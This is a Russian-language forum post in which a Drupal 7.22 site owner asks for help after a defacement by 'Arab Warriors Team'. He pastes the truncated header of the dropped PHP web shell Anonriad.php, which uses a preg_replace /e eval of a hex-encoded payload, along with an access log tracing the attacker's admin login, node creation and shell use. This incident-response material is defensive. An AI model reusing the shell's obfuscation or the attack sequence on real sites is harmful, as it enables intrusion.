Поламали сайт HACKED BY ARAB WARRIORS TEAM

SergeyB 22 декабря 2014 в 15:02

Поламали сайт, Drupal 7.22

Выглядел после взлома так - http://drupalir.com/node/62 (это не мой сайт), скриншот во вложении
19 декабря в 10.19 появился файл в корне - Anonriad.php, index.php был заменен.

Понятно, сам - не обновлял. Прошу помощи, если возможно определить как был сломан сайт, какие меры предпринять (что где почистить и проверить) перед обновлением.

Спасибо!

Содержимое Anonriad.php:

<?php #v2.3 //Version
$auth_pass = ""; //75b43eac8d215582f6bcab4532eb854e
$color = "#25ff00"; //Colour
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x и т.д.

Логи в момент взлома с IP 95.212.150.178 - - [19/Dec/2014:10:16:13 +0200]

[10:16:13] "GET /user/login HTTP/1.0" 200 6637 "http://www.notascent.co.il/sites/all/themes/riada/css/exploit.php?url=si..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/css/css_791YXBaKKm1ORM_7huSKEsIV9tSWq6wmRkERhuXpN6w.css HTTP/1.0" 200 1902 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/css/css_NqhgInM0lTgqO7vX0jh4qaY-WxBl70tE1_C8Vk_uuD4.css HTTP/1.0" 200 1219 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/css/css_2JBDoKBVeptGkqRr7EWXMy6YH0C_gyqI9SSEnrWXajw.css HTTP/1.0" 200 2445 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/css/css_i5RWKUXDQjEJ_HbNVTbHKenTisV2HJHBVdnERBImN9A.css HTTP/1.0" 200 6338 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/js/js_xAPl0qIk9eowy_iS9tNkCWXLUVoat94SQT48UBCFkyQ.js HTTP/1.0" 200 32743 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/js/js_LDA_hkHYO5oKj8zDCk7PX266O_ovBx08IKaZar1_pO0.js HTTP/1.0" 200 6981 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/js/js_qOffZi7JWom9r6Ekgjinr7QDy3A7CFqgvmUGdOgP8kY.js HTTP/1.0" 200 37674 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:14] "GET /sites/default/files/qr-777rcing-small.png HTTP/1.0" 200 294 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/777_logo_250px.png HTTP/1.0" 200 8368 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/777rcing-qr.jpg HTTP/1.0" 200 25001 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/slides/recommendations/rec_slide3_ms.jpg HTTP/1.0" 200 5089 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/slides/recommendations/rec_slide2_tri.jpg HTTP/1.0" 200 4576 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/slides/recommendations/rec_slide1_dan.jpg HTTP/1.0" 200 5596 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/default/files/777rcing-price-calculator.png HTTP/1.0" 200 32494 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/all/themes/777/images/li-blue-circle.png HTTP/1.0" 200 177 "http://site.ru/sites/default/files/css/css_i5RWKUXDQjEJ_HbNVTbHKenTisV2H..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/all/libraries/superfish/images/arrows-777777.png HTTP/1.0" 200 289 "http://site.ru/sites/default/files/css/css_2JBDoKBVeptGkqRr7EWXMy6YH0C_g..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:15] "GET /sites/all/libraries/superfish/images/shadow.png HTTP/1.0" 200 5891 "http://site.ru/sites/default/files/css/css_2JBDoKBVeptGkqRr7EWXMy6YH0C_g..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:16] "GET /sites/default/files/favicon.ico HTTP/1.0" 200 894 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:20] "POST /user/login HTTP/1.0" 302 20 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:21] "GET /user/1 HTTP/1.0" 200 8964 "http://site.ru/user/login" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/css/css_XfCdeEtKlbkG_tqfyKTegRl0fh651tkF-_sjnwRUm1o.css HTTP/1.0" 200 3028 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/css/css_Ik-aXOOAFZOQ1ZxF1J4K73SY-DdEiARJDW_4kZpx55k.css HTTP/1.0" 200 1066 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/all/modules/simplemeta/css/simplemeta.css?netw7s HTTP/1.0" 200 515 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/css/css_kk-FIzsCt8r3d1OiyOuXfbMl-3h41-tNcoziBFfsZ4U.css HTTP/1.0" 200 2580 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/js/js_efpgjZVoKE4yOllZ9x0H_iTGDnjuNhKpKoD8fm3mncg.js HTTP/1.0" 200 21401 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/js/js_nv2SaN8iSRRXw5oX7d3qhllIpa8K3-Y6Oi2H5cXGMG8.js HTTP/1.0" 200 10002 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/all/modules/simplemeta/js/simplemeta.js?netw7s HTTP/1.0" 200 417 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:22] "GET /sites/default/files/js/js_EwEZFNkTWwJSuk-vmxKimqCmQnuKQJ0gIVmqcat7WhY.js HTTP/1.0" 200 28925 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:23] "GET /modules/toolbar/toolbar.png HTTP/1.0" 200 558 "http://site.ru/sites/default/files/css/css_kk-FIzsCt8r3d1OiyOuXfbMl-3h41..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:23] "GET /sites/all/modules/simplemeta/css/img/buttons.png HTTP/1.0" 200 5492 "http://site.ru/sites/all/modules/simplemeta/css/simplemeta.css?netw7s" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:23] "GET /modules/contextual/images/gear-select.png HTTP/1.0" 200 506 "http://site.ru/sites/default/files/css/css_XfCdeEtKlbkG_tqfyKTegRl0fh651..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:16:23] "GET /misc/grippie.png HTTP/1.0" 200 106 "http://site.ru/sites/default/files/css/css_791YXBaKKm1ORM_7huSKEsIV9tSWq..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:00] "GET /modules/overlay/images/background.png HTTP/1.0" 200 76 "http://site.ru/sites/default/files/css/css_XfCdeEtKlbkG_tqfyKTegRl0fh651..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:00] "GET /admin/appearance?render=overlay HTTP/1.0" 200 4598 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/css/css_pbm0lsQQJ7A7WCCIMgxLho6mI_kBNgznNUWmTWcnfoE.css HTTP/1.0" 200 2217 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/css/css_vdCzpt5RRVtDzGpF94dcgdqUpCnRccmWqw97zGgqJww.css HTTP/1.0" 200 1759 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/css/css_0qCS2kFs9-L8lHJ6UchvAHBOijP5qjMPv6-clk_9gRk.css HTTP/1.0" 200 801 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/css/css_ABmXGW3jlpNaBRmWVTJUFNYGbVFnilqYg_EngwXFiNc.css HTTP/1.0" 200 4233 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/js/js_E4YhD4qHwDovSkAi8qE7do-fbLhkuj5EPh68sqR8Y14.js HTTP/1.0" 200 9522 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/default/files/js/js_RLqP2t_5MASj5Rd5ZTKq8JOfRv7xocVdIA3yAsCtBSU.js HTTP/1.0" 200 7043 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:01] "GET /sites/all/themes/777/screenshot.png HTTP/1.0" 200 8883 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /themes/bartik/screenshot.png HTTP/1.0" 200 19658 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /themes/seven/screenshot.png HTTP/1.0" 200 12298 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /sites/all/themes/zen/zen-internals/screenshot.png HTTP/1.0" 200 19703 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /themes/garland/screenshot.png HTTP/1.0" 200 10950 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /themes/stark/screenshot.png HTTP/1.0" 200 11662 "http://site.ru/admin/appearance?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /modules/overlay/images/close.png HTTP/1.0" 200 344 "http://site.ru/sites/default/files/css/css_vdCzpt5RRVtDzGpF94dcgdqUpCnRc..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /modules/shortcut/shortcut.png HTTP/1.0" 200 558 "http://site.ru/sites/default/files/css/css_0qCS2kFs9-L8lHJ6UchvAHBOijP5q..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:02] "GET /themes/seven/images/buttons.png HTTP/1.0" 200 786 "http://site.ru/sites/default/files/css/css_ABmXGW3jlpNaBRmWVTJUFNYGbVFni..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:11] "GET /node/add?render=overlay HTTP/1.0" 200 4156 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:11] "GET /sites/default/files/css/css_IufM3SZR_igg1vDPnOP9C4lSkbdQriNJqwaJ-DZ6kCE.css HTTP/1.0" 200 592 "http://site.ru/node/add?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:11] "GET /sites/default/files/js/js_n-x0O1ouYE1g5jLAcvRLZcXOhySqSiit2lVPa15ZHi8.js HTTP/1.0" 200 8796 "http://site.ru/node/add?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:11] "GET /sites/default/files/js/js_gvr-jG_Q3g1TUarJmaJrYi7jDqMYu-18anCVZ3I1tu4.js HTTP/1.0" 200 2656 "http://site.ru/node/add?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:12] "GET /themes/seven/images/list-item.png HTTP/1.0" 200 195 "http://site.ru/sites/default/files/css/css_ABmXGW3jlpNaBRmWVTJUFNYGbVFni..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:25] "GET /node/add/page?render=overlay HTTP/1.0" 200 8176 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/css/css_g6BHMTouiQTdbzWDEEGT2nkJX-QqclhtbzG6sUKituY.css HTTP/1.0" 200 2143 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/css/css_u8qTZdKW7Rm0mvCuvsDYjRHboV5_2oZ6vHslJTGAAlU.css HTTP/1.0" 200 314 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/css/css_B8i35bR64U0LArkCEWhw3wHXq-b4VJxsiGDLVttFpEk.css HTTP/1.0" 200 982 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/js/js_dTmtBQgE74lCSiMrQU6Fnk9MRQ4RteScgQvy0VIWcOA.js HTTP/1.0" 200 20236 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/js/js_Mf-zB6e4chGQAFxzz2XLBSe4F11Hq_fokY884ydCKlI.js HTTP/1.0" 200 4886 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/js/js_H0EH0osTSDdp8v3qSVqFJnWypUn64HU1ey4JwrbV1LQ.js HTTP/1.0" 200 474 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/js/js_hjLm09R05Wi45hhSJ-nFcEaJ-GfPjDMQk7VcibvfAD0.js HTTP/1.0" 200 12900 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/all/libraries/ckeditor/ckeditor.js?netw7s HTTP/1.0" 200 121172 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:26] "GET /sites/default/files/js/js_loJJMZ-yLpCFnc5Htc8xgIMfdfNbw5E30CdocHWSiaM.js HTTP/1.0" 200 3027 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /misc/help.png HTTP/1.0" 200 294 "http://site.ru/sites/default/files/css/css_B8i35bR64U0LArkCEWhw3wHXq-b4V..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /misc/menu-collapsed.png HTTP/1.0" 200 105 "http://site.ru/sites/default/files/css/css_pbm0lsQQJ7A7WCCIMgxLho6mI_kBN..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /themes/seven/images/fc.png HTTP/1.0" 200 82 "http://site.ru/sites/default/files/css/css_g6BHMTouiQTdbzWDEEGT2nkJX-Qqc..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /misc/throbber.gif HTTP/1.0" 200 1336 "http://site.ru/sites/default/files/css/css_pbm0lsQQJ7A7WCCIMgxLho6mI_kBN..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /sites/all/libraries/ckeditor/skins/kama/editor.css?t=D03G5XL HTTP/1.0" 200 4748 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:27] "GET /sites/all/libraries/ckeditor/lang/ru.js?t=D03G5XL HTTP/1.0" 200 8972 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:28] "GET /themes/seven/reset.css HTTP/1.0" 200 1275 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:28] "GET /themes/seven/style.css HTTP/1.0" 200 4599 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:28] "GET /sites/all/modules/wysiwyg/plugins/break/images/break.gif?t=D03G5XL HTTP/1.0" 200 108 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:28] "GET /sites/all/libraries/ckeditor/skins/kama/icons.png HTTP/1.0" 200 5598 "http://site.ru/sites/all/libraries/ckeditor/skins/kama/editor.css?t=D03G5XL" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:28] "GET /sites/all/libraries/ckeditor/skins/kama/images/sprites.png HTTP/1.0" 200 7086 "http://site.ru/sites/all/libraries/ckeditor/skins/kama/editor.css?t=D03G5XL" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:29] "GET /sites/all/modules/wysiwyg/plugins/break/break.css HTTP/1.0" 200 171 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:17:30] "GET /sites/all/libraries/ckeditor/plugins/styles/styles/default.js?t=D03G5XL HTTP/1.0" 200 598 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:45] "POST /node/add/page?render=overlay&render=overlay HTTP/1.0" 302 20 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:46] "GET /node/31?render=overlay HTTP/1.0" 200 1381 "http://site.ru/node/add/page?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:47] "GET /sites/default/files/css/css_jZkqxuWbJ8MzqjtN8Ycm8FGV0G0FAAdhBlhtOsOlg_4.css HTTP/1.0" 200 811 "http://site.ru/node/31?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:47] "GET /sites/default/files/js/js_mjUi0wflDli413YNYoHkaJSZRTukOUe5MUVedh4ALAA.js HTTP/1.0" 200 2190 "http://site.ru/node/31?render=overlay" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:48] "GET /node/31 HTTP/1.0" 200 9318 "http://site.ru/user/1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:49] "GET /misc/message-24-ok.png HTTP/1.0" 200 1058 "http://site.ru/sites/default/files/css/css_791YXBaKKm1ORM_7huSKEsIV9tSWq..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:18:58] "POST /node/31 HTTP/1.0" 200 9284 "http://site.ru/node/31" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:07] "POST /node/31 HTTP/1.0" 200 9292 "http://site.ru/node/31" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:14] "GET /Anonriad.php HTTP/1.0" 200 4457 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:15] "GET /favicon.ico HTTP/1.0" 404 234 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:16] "POST /Anonriad.php HTTP/1.0" 200 2581 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:23] "POST /Anonriad.php HTTP/1.0" 200 4457 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:19:28] "POST /Anonriad.php HTTP/1.0" 200 3145 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:20:59] "POST /Anonriad.php HTTP/1.0" 200 4460 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:07] "GET /riad.php HTTP/1.0" 200 832 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:12] "POST /Anonriad.php HTTP/1.0" 200 4422 "http://site.ru/Anonriad.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:14] "GET / HTTP/1.0" 200 10365 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:15] "GET /sites/default/files/slides/slide3_0.jpg HTTP/1.0" 200 60077 "http://site.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
[10:21:15] "GET /sites/default/files/slides/slide2.jpg HTTP/1.0" 200 62197 "http://site.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
